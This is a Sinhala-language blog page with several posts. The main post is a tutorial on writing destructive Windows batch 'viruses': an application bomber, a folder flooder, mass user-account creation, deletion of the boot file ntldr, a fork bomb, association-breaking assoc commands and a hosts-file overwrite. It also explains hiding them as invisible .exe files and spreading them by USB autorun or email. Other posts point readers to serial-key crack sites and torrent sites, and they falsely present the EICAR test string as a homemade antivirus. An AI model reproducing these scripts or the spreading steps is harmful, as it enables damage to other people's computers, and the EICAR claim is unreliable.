Pages

Monday, February 18, 2013

Virus එකක ක්‍රියාකාරිත්වය සහ virus සෑදීම

NOTE :- මේ පොස්ට් එක බලල virus ගැන දල අවබෝදයක් ලබා ගන්න.මේ virus හදන්න.එත් මේවගේ ක්‍රියාකාරිත්වය අත්හදා බලන්න යන්න නම් එපා !!!!


Notepad එක බාවිත කර වයිරසයන් නිර්මාණය කිරීම පිලිබද කලින් post එකකත් විස්තර කලා. ප්‍රායෝගිකව මේවායේ දැඩි බලපෑමක් නොමැති උනත් වයිරසයක මූලික ක්‍රියාකාරීත්වය හා කේත සටහන් හසුරවන ආකාරයන් පිලිබදව දල අවබෝදයක් ලබාගැනීමට මේ ක්‍රියාකාරම් ඉවහල් වෙයි

<<< අපි බලමු notepad එක හරහා කේත සටහන් කීපයක් මගින් වයිරසයන් කීපයක් නිර්මාණය කර එය .exe file එක බවට පත් කර ඒ .exe file එක පින්තූරයක් තුල සගවන්නේ කොහොමද කියලා. >>>

මුලින්ම අපි බලමු සරලම කේත කොටසක ක්‍රියාකාරීතවය කොහොමද හා ඒ කේත කොටසම .bat ආකාරයෙන් ක්‍රියාත්මක වන්නේ කොහොමද කියලා. ඔයාලා DOS OPEN කරගන්න. Start > Run > cmd මගින් dos වලට යන්න පුලුවන්. ඊලගට 'cd desktop' කියන command එක මගින් ඔයාලගේ desktop එකට මාරු වෙන්න. ඊලගට පහල command එකත් type කරන්න.

md x
cd x
md y
 

md කියන්නේ folder 1k හදන්න බාවිතා කරන command 1 . cd කියන්නේ folder 1න් මාරු වෙන්න බාවිත කරන command 1.

මේ commands ටිකම අපිට notepad එකක ලියලා එය .bat ආකාරයෙන් save කරන්න පුලුවන්.දැන් මෙ save කල .bat  file එක මත double click කලාමත් වෙන්නේ අපි මුලින්ම dos වලින් කරපු දේම තමයි. දැන් ඔයාලට පැහැදිලි ඇති මේ ගැන. ඉතින් මේ ආකාරයෙන් නිර්මාණය කරන්න පුලුවන් .bat file කීපයක් කේත සටහන් පහල ආකාරයෙන් දක්වන්න පුලුවන්.

1. Application Bomber

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Application Bomber ගණයට වැටෙන වයිරසයන් වල් මූලික ක්‍රියාකාරීත්වය මේ වගෙයි. මෙහිදී සිදු වන්නේ නම් කර ඇති එක් එක් වැඩසටහන් ඉබේම ක්‍රියාත්මක වෙන එකයි. x කියන සංරචකයෙන් මෙය නොනවත්වාම ක්‍රියාත්මක කරනවා. අවසානයේ පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වෙනවා..

2. Folder flooder

@echo off
:x
md %random%
goto x

මෙතනදී සිදුවන්නේත් දිගින් දිගටම folders නිර්මානය වීමයි. නොනවත්වාම x සංරචකයි නිසා මෙය සිදු වෙනවා. අවසානයේ පරිගනකයේ memoryයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර(struck) වෙනවා. %random% කියන ස්තානයට 1000 දුන්නොත් ඒ කියන්නේ කේතය %%1000% ලෙසින් දුන්නම folders 1000 හැදිලා තමයි නවතින්නෙ.


3.User account flooder

@echo off
:x
net user %random% /add
goto x

මේ ආකාරයේ වයිරසයකින් සිදුවන්නේ පරිගණකයට දරාගන්න නොහැකි ප්‍රමාණයෙන් user accounts දිගින් දිගටම නිර්මාණය කිරීමයි. %random% කියන ස්තානයට අපිට කැමති අගයක් ලබාදෙන්න් පුලුවන්. ඒ ලබාදෙන අගය අනුව user accounts හැදෙනවා.


4. Deleting boot files

පරිගණකය boot වන්න බාවිත කරන system files කීපයෙන් ප්‍රදාන වන්නේ ntldr කියන file එකෙන්. මෙය පවතින්නේ සැගවුන file 1k විදියටයි
ඉතින් මේ ගොනුව මකා දමන්න වයිරසයක් ලියන්න පුලුවන්. කේතය පහල ආකාරයි

attrib -S -R -H C:\ntldr
del ntldr

මේ කේතය .bat  file ලෙසින් save කර ක්‍රියාත්මක කලාම ntldr ගොනුව මැකිලා යනවා. ඊලගට පරිගනකයට boot වෙන්න බැරිව පහල error message එක දෙනවා.

5. Fork Bomb

%0|%0

පරිගණකයේ ක්‍රියාකාරීත්වය අනිසි ආකාරයෙන් ඉහල නන්වන්න මේ කේතය බාවිතා කරන්න පුලුවන්. මේ මගින් පරිගණකයේ Memory වගේම CPU දාරිතාවයත් 100% බාවිතා කරන බව පෙන්නනවා.

6. Extension Changer

මේවගේ ක්‍රියාකාරිත්වය අත්හදා බලන්න යන්න නම් එපා !!!!

@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

මේක නම් පිස්සුවක්. .txt  file extention එක .jpg ආකාරයෙන් මාරු කරන්න පුලුවන්. ඉතින් ඕනේම ගොනුවක extention එක මේ ආකාරයෙන් මාරු කරගන්න පුලුවන්. පරිගණකයේම සියලුම files .jpg උනොත්? පිස්සු හැදෙන් නැතුව තියෙයිද? anything කියන තැනට අපිට මාරු කරන්න ඕනේ extention එක යොදන්න. උදාහරණයක් ලෙස assoc .txt=.jpg ලෙසින්

7. DNS Poisoning

ඔයාලා දන්නවා පරිගණකයේ hosts කියලා ගොනුවක් තියනවා කියලා. එයි බාවිතා කරන්නෙ අන්තර්ජාල සේවාවන් වෙනුවෙන්. ඉතින් මේ හරහා වෙබ් අඩවි වලට පිවිසීම වාරණය කරන්න පුලුවන්. අපි කරන්න හදන්නේ දැනට බාවිත කරන ජනප්‍රිය වෙබ් අඩවි මේ තුලට රිංගවීම. ඉන්පසු පරිගණකය බාවිතා කරන්නා ඒ වෙබ් අඩවි වෙත යන්න උත්සාහා කලාම යන්න බෑ කියලා error message එක එනවා.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts


xxx.xxx.xxx.xxx වෙනුවට IP address එකත් www.anything.com වෙනුවට අපිට වාරණය කල යුතු වෙබ් අඩවි ලිපිනයත් එකතු කරන්න


බොහොමයක් .bat ආකාරයේ files නූතන anti virus softwares මගින් අදුනාගෙන ඉවත් කරනවා. ඉතින් මේවා ලියලා සුරක්ශිත කරද්දිම ඔයාලගේ anti virus softwares මගින් වයිරසයක් ඇවිත් කියලා දැන්වුවොත් බය වෙන්න එපා.

.bat ආකාරයේ වයිරසයන් වල යම් යම් සීමාවන් තියනවා.

1.ප්‍රහාරයට ගොදුරුවන්නාට ඉතාමත් පහසුවෙන් මේ .bat ගොනුව notepad මගින් විවෘත කර බැලීමේ හැකියාව් පවතිනවා

2.නිරන්තරයෙන් dos මෙහෙයුම් පද්දතිය විවෘත වී මේ කේතයන් ක්‍රියාත්මව වන නිසා ප්‍රහාරයට ගොදුරුවන්නාට එය නැවැත්විය හැකියි

ඉතින් මේ සීමාවන් දෙකෙන් .bat වයිරසය බේරා ගැනීමට අපිට කල හැක්කේ කුමද්ද? කල හැකි එකම දේ මෙය වෙනත් extention එකට මාරු කරන්න ඕනේ. ඒ කියන්නෙ .bat extention එක .exe බවට පත් කරන්න ඕනේ. කොහොමද මේක කරන්නේ. ඒවෙනුවෙන් නිර්මාණය කල 3rd party software 1 තමයි Batch To Exe converter කියන්නේ. ඒක පහල link 1න නොමිලේ බාගත කරගන්න පුලුවන්.

Download

මේ software 1 බාගත කරගෙන open කරගන්න. ඊලගට batch file කියන ස්තානයට .bat file 1 තෝරා දෙන්න. Save as කියන ස්තානයට අලුත් .exe file 1 save විය යුතු ස්තානය ලබා දෙන්න. visibility කියන ස්තානයේ 'Invisible application' ලෙසින් තෝරපුවාම .bat වලදී මෙන් dos මෙහෙයුම් පද්දතිය විවෘත වීමක් සිදුවන්නේ නෑ. ඉන්පසුව compile click කරන්න

හොදයි. ඔන්න අපිට ඉහතින් සදහන් කල කේත කොටසක් සහිත වයිරසයක් අඩංගු .exe file 1ක් ලැබුනා. ඉතින් මෙය ක්‍රම කීපයකින් පරිගණක වලට එක් කරන්න පුලුවන්. pen එක හරහා, email මගින් image 1ක සගවා මේවා යවන්න පුලුවන්.

pen එක මගින් මේ වයිරසයන් යවන්න උත්සාහා කරනවා නම් අපි ඔටෝරන් file 1ක් නිර්මාණය කරන්න ඕනේ. notepad එකක් විවෘත කරගන්න. පහත කේත කොටස නිවැරදිව type කරන්න.

[autorun]
open=anything.exe
Icon=anything.ico


anything.exe කියන්නේ ඔයාලාගේ වයිරසයේ නම. මෙය ‘autorun.inf’ ලෙසින් save කරන්න. මේ file 1 හා වයිරස් file 1 pen එකට copy කරන්න. එවිට pen එක තුල autorun.inf ගොනුව හා වයිරස් ගොනුව අඩංගු විය යුතුයි.

මේවා ඉගන ගැනීම වෙනුවෙන් භාවිත කරන්න.අනුන්ට කරදරයක් වෙන විදිහට අත්හදාබලන්න යන්න නම් එපා යාලුවනේ.....



Comment එකක් දාල යන්න අමතක කරන්න එපා.....

Windows 7 පාවිච්චි කරන ඔබ ඇත්තටම Computer එකේ Admin ද ???

windows මෙහෙයුම් පද්දතිය පාවිච්චි කරන අය ඇත්තටම හිතන්න ඕන එක දෙයක් තමයි තමන් ඇත්තටම computer එකේ පුර්ණ බලදාරියාද කියල. .

computer එකේ Administrator ව enable කරල ගත්තනම් වැඩේ හරියනවා. දැන් අපි බලමු එක කොහොමද කරන්නේ කියල

එතකොට මේ මම Admin නෙවෙයිද..? කියල සමහර අය අහන්න පුළුවන්.කවුද කියන්නෙ ඒ ඇඩ්මින් කියල එහෙනම් අපිරියල් Administrator account එක හදාගනිමු..

Control panel > Administrative Tools > Local Policy > Security Options > Accounts වලට යන්න.
දැක්කද එහා පැත්තෙ Administrator account status : එක Disable කියල තියනව..ඒක උඩ double click or right click කරල enable කරගන්න එකයි කරන්න තියෙන්නෙ..
දැන් ඔයා ඉන්න account එකෙන් switch user හරි log off කරල හරි බලුවනම් පෙනෙයි එළියෙන් Administrator කියල account එකක් තියෙනව.. 

දැන් අලුතින් හැදිලා තියන account එක තමි හරි ඇඩ්මින් account එක..එකට log වෙලා ඔයාලට කැමති දේවල් වෙනස් කරගන්න, ඇතුල් කරගන්න පුළුවන්.ආ... PASSWARD එකක් දාන්නත් අමතක කරන්න එපා හොදද...
 


Comment එකක් දාල යන්න අමතක කරන්න එපා.....

Sunday, February 17, 2013

චිත්‍රපටි උපසිරැසි (Subtitles) හොයාගෙන කැමැති භාෂාවකට හරවමු


මෙන්න මේ වෙබ් අඩවියෙන් ඕනෑම චිත්‍රපටියක subtitles හොයාගන්න පුළුවන්. 

ඉතින් මෙහි පවතිනවා ලෝකයේ නිශ්පාදනය කරන බොහොමයක් චිත්‍රපට වල උප සිරැසි  ගොනු. අපිට ලබාගන්න ඕනේ චිත්‍රපටය search කරලා අදාල උප සිරැසි ගොනුව පහල රූපයේ ආකාරයෙන් බාගත කරගන්න් පුලුවන්.

උප සිරැසි ගොනුවක් .srt ගොනුවක් ලෙසින් පවතින අතර එය නෝට්පෑඩ් මෘදුකාංගයෙන් විවෘත් කල විට් පහල රූපයේ ආකාරයෙන් දකින්න් පුලුවන්. ඉතින් මේවා දක්නට ලැබෙන්නේ ඉංග්‍රීසි භාෂාවෙන්. ඔයාලට unicodes බාවිතයෙන් මේ ගොනුවට අදාල සිංහල උප සිරැසි එකතු කරගන්න පුලුවන්. 



ඉන්පසුව එය save කර උප සිරැසි ගොනුව හා අදාල චිත්‍රපටය එකම folder 1ක තබා චිත්‍රපටය ක්‍රියාත්මක් කරවීමෙන් අපිට අදාල උප සිරැසි බලාගන්න පුලුවන්.

Software එකක් භාවිතයෙන් උප සිරැසි එකතු කිරීම

චිත්‍රපට වලට උප සිරැසි එක් කර ගැනීම වෙනුවෙන් බාවිත කල හැකි සරල softwares බොහොමයක් අන්තර්ජාලයෙන් හොයාගන්න පුලුවන්. එකක් තමයි Aegisub කියන්නේ. ඒක පහල link 1න් බාගත කරගන්න පුලුවන්

http://www.aegisub.org/
ඉතින් මේ වෙබ් අඩවියෙන් මෙ software 1ක බාගත කරගන්න. එය පහල රූපයේ ආකාරයෙන් අපිට කැමති විදියටකට බාගත කරගන්න පුලුවන්.


steps කීපයකින් මේ software ස්තාපිත කරගන්න හැකියාව තියනවා වගේම portable ආකාරයෙන් බාගත කරගත්තා නම් instoll කිරීමකින් තොරව මෙය ක්‍රියාත්මක කරවා ගන්න පුලුවන්.


ඉතින් මේ software එක බාවිත කරලා අපි මුලින්ම උප සිරැසි ගොනුවක් නිර්මාණය කරන ආකාරය බලමු. පහල රූපයේ මෙන් open > Open Subtitles වලට යන්න. අපි කලින් පියවරේදී බාගත කරගත් උප සිරැසි ගොනුව මේ ආකාරයෙන් software එක හරහා විවෘත කරගන්න පුලුවන්.



 පහල රූපයේ ආකරයට එය විවෘත වෙනවා.


unicodes use කරමින් අපිට ලබාදෙන්න තියන උප සිරැසි පහල රූපයේ ආකාරයෙන් ලබාදී save කරගන්න පුලුවන්. ඔයාලට තියෙන්නෙ ඉංග්‍රීසි උප සිරැසි මකල සිංහලෙන් ටයිප් කරලා save කරන්න පමණයි


ඊලගට අපි බලමු චිත්‍රපටයටම උප සිරැසි එකතු කරන්නේ කොහොමද කියලා. මුලින්ම Video > Open Video මගින් ඔයාලට උප සිරැසි එකතු කිරීමට ඕනේ කරන චිත්‍රපටය software එකට ලබාගන්න.


එය පහල රූපයේ මෙන් කුඩාවට පෙනෙයි. ඊලගට දකුණු පසින් ඇති කොටුවේ උප සිරැසි type කර හරි සලකුන එබීමෙන් එය චිත්‍රපටයට එකතු කරගන්න පුලුවන්. ඕනේ නම් Play කරලා බලන්නත් පුලුවන්. ඊලගට මේ file save කරගන්න. ඔන්න ඉතින් උප සිරැසි සහිත චිත්‍රපටයක් අපිට ලැබෙනවා. ඉතින් නිවැරදි උප සිරැසි බාවිතා කරන එකත් හරි වෙලාවට උප සිරැසි පෙනෙන ලෙස සකසා ගන්න එකත් මේ software එක හරහා කරගන්න පුලුවන්













Comment එකක් දාල යන්න අමතක කරන්න එපා.....

Saturday, February 16, 2013

Serial Keys හොයාගන්න නියම ක්‍රම 3k

පරිගනක බාවිතා කරන අපි කාටත් තියන ගැටලුවක් තමයි මෘදුකාංග බාවිතයේදී ඒවාට Serial Key හොයන එක. මොකද හැම මෘදුකාංගයක්ම අපිට මිලදී ගන්න බැරි හින්දා අපි ගොඩක් බාවිතා කරන්නේ අදාල මෘදුකාංගයේ හොර කොපි. ඉතින් හොර කොපියක් කියලා අහු උනාම අපිට ආයෙමත් එක බාවිතා කරන්න් බැරි වෙනවා.. හරි අපි බලමු කොහොමද මේ මෘදුකාංග වලට Serial Key හොයන්නේ කියලා..

අපි දැන් බලමු මොනාද මේ ක්‍රම 3න කියලා

(1) Google Search ක්‍රමය

1. ගූගල් අඩවියට පිවිසෙන්න.
2. අපිට Serial Key එකක් ලබ ගැනීමට ඕනේ මෘදුකාංගයෙ නම සමග 94FBR කියලා සදහන් කරලා search කරන්න.

ඔන්න අපිට ලැබෙනව folder lock 7 වලට අදාල Serial Key එකක්. ඇත්තටම මොකද මෙතන වෙන්නේ?

94FBR කියන්නේ මොකක්ද? 94FBR කියන්නෙ Office 2000 Pro සංස්කරනයේ Activation Key එක මගහැරීම සදහ ලෝකය වටේම ගිය Serial Key එකක මුල කොටස. මේ කොටස බාවිතා කිරීමෙන් අපි සොයන Serial Key එක Serial Key අංකයන් තියන වෙබ් අඩවි වලට පමනක් යොමු කර නිවැරදි Serial Key එකක් ලබා දෙනවා

(2) Craagle Software use කිරීම

Craagle කියන්නේ පොඩි software එකක්. මේක බාවිතා කරලත් අපිට පුලුවන් ඕනෑම Serial Key එකක් හොයාගන්න.මෙතනින් ගන්න පුළුවන්.


ඉතින් මේ software එක බාවිතා කරලා අපිට පහල වෙබ් අඩවි වලින් Serial Key හොයාගන්න පුලුවන්.

Seriall.Com, FreeSerials.Com, SerialSite.Com, Serials.Ws, Andr.Net, SerialKey.Net, SerialArchive.Com, CrackzPlanet.Com,MsCracks.Com, CrackPortal.Com, KeyGen.Name, TheKeys.Ws,FreeSerials.Ws, FreeSerials.Spb.Ru, Serial.220volt.Info, SerialCodes.Net

මේ software එක බාවිතා කිරීමට පෙර ඔබගේ Firewall එක ක්‍රියා විරහිත කරන්න.

(3)Serial Keys ලබාදෙන වෙබ් අඩවි use කිරීම

අද වෙනකොට ගොඩක් වෙබ් අඩවි තියනවා Serial Key,Cracks නොමිලේ ලබා දෙන. පහල තියෙන්නේ ඒ වගේ වෙබ් අඩවි කීපයක්

1) http://serials.ws
2) www.serialnumber.in
3) www.findserialnumber.com
4) www.keygenguru.com
5) www.keygens.nl
6) http://www.crackfound.com
7) http://www.serials.ws
8) www.keygen.in
9) www.smartserials.com
10) www.serialkey.net
11) www.zcrack.com

ඔයාලගේ අදහස් ප්‍රශ්න එහෙම තියනවා නම් comments box එකේ දාල යන්න අමතක කරන්න එපා

Comment එකක් දාල යන්න අමතක කරන්න එපා.....

Virus Guard එකක් අපිටම හදාගන්න පුලුවන්ද?

විවිධ Virus Guard ගැන කියල දුන්න ඔයාලට දැන් මම කියන්න යන්නේ කොහොමද virus protection එකක් තනිවම හදාගන්නේ කියලා..මීක හරි simple game එකක් affa..

ඔයාට තියෙන්නේ පහල තියන වචන පේලිය note pad එකට දමලා virus.exe කියලා ඒක save කරන එක විතරයි. පට ගාලා අල්ලනවා.

මෙන්න එහෙනම් වචන ටික


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

මගේ එකට නම් වැඩ කරනවා. word pad වල බෑ. note pad වල. ඕනිම එකකට හරි යනවා. මන් ගියා එහෙනම්.






Comment එකක් දාල යන්න අමතක කරන්න එපා.....

Friday, February 15, 2013

ගොඩක් වැදගත් Torrent Sites

ඔන්න අද මන් ඔයාලට ගෙනාවා ටොර්රෙන්ට් නියම Torrent Sites ගොඩක links ටිකක්..ගිහිල්ලම බලන්නකෝ .ගොඩක් හොද ,fakes නැති torrents මේවගෙන් හොයාගන්න පුළුවන්. torrents ගැන දන්නේ නැති අය මේ ලිපිය බලලම ඉන්නකෝ.

Torrents Web Sites

  • seedpeer.me
  • isohunt.com
  • bitsnoop.com
  • torlock.com
  • h33t.com
  • 1337x.org
  • torrentsdownload.me
  • vcdq.com
  • torrenthound.com
  • vertor.com
  • thepiratebay.org
  • torrentz.eu
  • extratorrent.com
  • torrentreactor.net
  • kat.ph
  • torrentcrazy.com
  • sumotorrent.com
  • onlytorrents.com
  • fenopy.com
  • torrentportal.com
  • torrentfunk.com
  • take.fm
  • monova.org
  • rarbg.com
  • eztv.it

Comment එකක් දාල යන්න අමතක කරන්න එපා.....